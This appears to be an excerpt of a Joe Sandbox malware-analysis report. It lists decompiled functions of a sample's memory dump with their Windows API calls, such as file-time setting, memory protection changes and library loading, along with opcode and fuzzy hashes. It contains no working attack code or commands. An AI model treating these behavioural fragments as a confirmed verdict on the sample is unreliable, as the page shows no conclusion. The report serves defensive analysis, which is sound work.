Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction ID: 2477af1e6cb2ef82712493f02e3e6597ef6a144179454d8dca48a01c8c3ca0ed
Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction Fuzzy Hash: 13515DB1904219AFDF149F68DC81BADBBB9FF48304F1004AEF219E3291DB715A808F59

Function 008DEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008DEBB2

Part of subcall function 008C51AF: _memset.LIBCMT ref: 008C522F
Part of subcall function 008C51AF: _wcscpy.LIBCMT ref: 008C5283
Part of subcall function 008C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293

KillTimer.USER32(?,00000001,?,?), ref: 008DEC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008DEC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00933C88

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
Instruction ID: 058acb4b3b7feeb999be09631109fb5ab4a5629b93f2f25232196cf1e7441d52
Opcode Fuzzy Hash: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
Instruction Fuzzy Hash: E921DA745587849FE7339B28CC55FE7BBECEB01308F04444EE6CA9A241C3742A84CB51

Function 0090C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0090C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0090C746

Strings

aut, xrefs: 0090C740

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
Instruction ID: 83db092722b868d04f478b8a4a7b605f90495e4d06439d8a0f0a2da816f2a9b2
Opcode Fuzzy Hash: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
Instruction Fuzzy Hash: 59D05E7950030EABDB50ABA0DC0EF8A776C9B00708F0041A0B764A50B1DAF0E6999B55

Function 008C4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008C5022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
Instruction ID: c42083c2b2944e2b1cf461e96df45b6aa7febb2693d113d27a7375b9e3f41880
Opcode Fuzzy Hash: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
Instruction Fuzzy Hash: A0314CB1509B01CFD721DF24D885B9BBBF8FB49308F00092EE59AC6251E771A985CB96

Function 008E395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 008E3973

Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81E9
Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81F3

__NMSG_WRITE.LIBCMT ref: 008E397A

Part of subcall function 008E821F: GetModuleFileNameW.KERNEL32(00000000,00980312,00000104,00000000,00000001,00000000), ref: 008E82B1
Part of subcall function 008E821F: ___crtMessageBoxW.LIBCMT ref: 008E835F

Part of subcall function 008E1145: ___crtCorExitProcess.LIBCMT ref: 008E114B
Part of subcall function 008E1145: ExitProcess.KERNEL32 ref: 008E1154

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
Instruction ID: f441c4d6594ad5ea3a7976a1ba2592e2ce4e3c6ce9bea72f8d4b277be13108b7
Opcode Fuzzy Hash: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
Instruction Fuzzy Hash: 6401B936349281AAE6153B2BDC4AB2E3798FB83764F210029F505DB283DFB19D0046A5

Function 0090C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0090C385,?,?,?,?,?,00000004), ref: 0090C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0090C708
CloseHandle.KERNEL32(00000000,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C70F

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
Instruction ID: 429e1e3d7c6eb5c8c969c893142d6d77a9a437ac38b5ee1bd0b138e57790d0ff
Opcode Fuzzy Hash: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
Instruction Fuzzy Hash: 5EE0863A146214BBD7211F54AC09FCE7B18AB0AB64F104210FF14690E097B125119798

Function 0090BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0090BB72

Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3

_free.LIBCMT ref: 0090BB83
_free.LIBCMT ref: 0090BB95

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction ID: ac84544b6a5f00c6f2fd523611b0958038b4259029f23d9b903357247a253c66
Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction Fuzzy Hash: E0E012B26417818BDE24657E6E4CEB323CC9F05355724081DB459E7186CF34E84085A4

Function 008C2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 008C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME), ref: 008C2303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008C25A1
CoInitialize.OLE32(00000000), ref: 008C2618
CloseHandle.KERNEL32(00000000), ref: 0093503A

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
Instruction ID: d3ab2ec1264865d7b213a127f60a8dcde15f9d8b86b6721be2d2b891363c93a4
Opcode Fuzzy Hash: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
Instruction Fuzzy Hash: 2371AFB59293458BC714EF6EE994999BBFCFB99344780412EE129C77B2CB308402EF15

Function 008EE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 008EEA29
__close_nolock.LIBCMT ref: 008EEA42

Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
Instruction ID: 6e791a2111228ea6e64ab371b262a6e55b12c95a7cf147aed6367e1bae4c6139
Opcode Fuzzy Hash: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
Instruction Fuzzy Hash: AF11C672809AE58AD311BF6ED8413183A61FF93335F264364E820DF2E3D7B4880097A2

Function 008DF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F

std::exception::exception.LIBCMT ref: 008DF51E
__CxxThrowException@8.LIBCMT ref: 008DF533

Part of subcall function 008E6805: RaiseException.KERNEL32(?,?,0000000E,00976A30,?,?,?,008DF538,0000000E,00976A30,?,00000001), ref: 008E6856

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
Instruction ID: a6467cda346b06f3950da57a0d573e4b926d7e01afe6f8c330f9d428a6a6e646
Opcode Fuzzy Hash: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
Instruction Fuzzy Hash: ABF0813110425EA7DB14BF9DE80199E7BE8FF02354F604226FA09D2282DBB0965096A6

Function 008E35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

__lock_file.LIBCMT ref: 008E3629

Part of subcall function 008E4E1C: __lock.LIBCMT ref: 008E4E3F

__fclose_nolock.LIBCMT ref: 008E3634

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
Instruction ID: 03fde320d666b026e1160cbabc49272e5d6c5b293e65b6a8eed2e1ba206cdd8d
Opcode Fuzzy Hash: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
Instruction Fuzzy Hash: D2F0BB31801695BAD7117BBB880A76E76A0FF63334F258108E415EB2E1C77C8E01AB56

Function 008E2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 008E2A0B

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
Instruction ID: 510a49c18cb75d9d7615ec7721d70721c06be144db6c82b1b71c3c45bbe0fe62
Opcode Fuzzy Hash: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
Instruction Fuzzy Hash: 024193716007969FDB2C9E6BC8819AE7BAEFF46360B24853DE855C7241EB70DD418B40

Function 008DED15 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 008DEDC7

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
Instruction ID: 357f500893b8f2eaa715cc3626edcf72645600e5d1d8998d35cd7eab0f2ffa85
Opcode Fuzzy Hash: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
Instruction Fuzzy Hash: 4831B174A001099BD718EF5CC484A69FBB6FB49344B6487A6E40ACF366DB31EDC1CB90

Function 008C41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C4214: FreeLibrary.KERNEL32(00000000,?), ref: 008C4247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB

Part of subcall function 008C4291: FreeLibrary.KERNEL32(00000000), ref: 008C42C4

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
Instruction ID: fa294c00d61b4897a0515a25941a0ff7c6d96e3fe0a70d8105b86353b8852d44
Opcode Fuzzy Hash: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
Instruction Fuzzy Hash: 5611C131600206AACB10AB78DC27F9E77B9EF80704F10842DB596E61C1DB70DA809B62

Function 008EAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 008EAFC0

Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
Instruction ID: c82d2e714370a112a93928273ba4da5f179310f9c60cbb6a7717f041b5d7c361
Opcode Fuzzy Hash: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
Instruction Fuzzy Hash: CD11B272804AD49FD7126FAA980176A3A60FF83335F254250E434DB1E3DBB4AD009BA2

Function 008C39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction ID: 0cb3e3041c8c82844ca15c53d0a0b7af48076d8df992e045d2b9c1e1521c1203
Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction Fuzzy Hash: 1001127150010DAECF05EF64C892DEEBB78FB11344F108129B556D61A5EA30DA89DF61

Function 008E2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 008E2AED

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
Instruction ID: d51cb2ce9f02367e5eefdb181089b6ac5cd1fdeb7f7faee59ed6975d7117d196
Opcode Fuzzy Hash: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
Instruction Fuzzy Hash: CFF0C231900295EADF21AF6E8C0279F3AA9FF42320F148425B414DB191DB788A62DB52

Function 008C4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,008C39FE,?,00000001), ref: 008C4286

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
Instruction ID: c051c718a5291b5facb6cf79ce839aa95888606e2d23fdf17d3f5d4e259b63fb
Opcode Fuzzy Hash: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
Instruction Fuzzy Hash: B2F0F275509702CFCB349F65D8A6D66BBF5FB0532A3249A2EF19682610C7329980DB50

Function 008C40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

